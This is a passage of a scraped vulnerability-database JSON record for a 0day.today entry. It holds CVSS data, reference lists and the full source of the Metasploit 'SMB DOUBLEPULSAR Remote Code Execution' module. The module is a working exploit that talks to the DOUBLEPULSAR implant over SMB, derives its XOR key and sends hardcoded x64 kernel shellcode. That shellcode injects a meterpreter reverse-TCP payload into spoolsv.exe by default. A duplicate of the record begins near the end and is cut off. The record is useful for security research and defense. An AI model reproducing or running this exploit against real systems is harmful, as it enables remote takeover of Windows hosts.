"ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-05T22:11:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T22:11:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-06] #"}, "lastseen": "2021-09-05T22:11:00", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "56883ce7412d8efc8b83588900278f4f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-07T06:15:22", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-07T06:15:22", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T06:15:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n 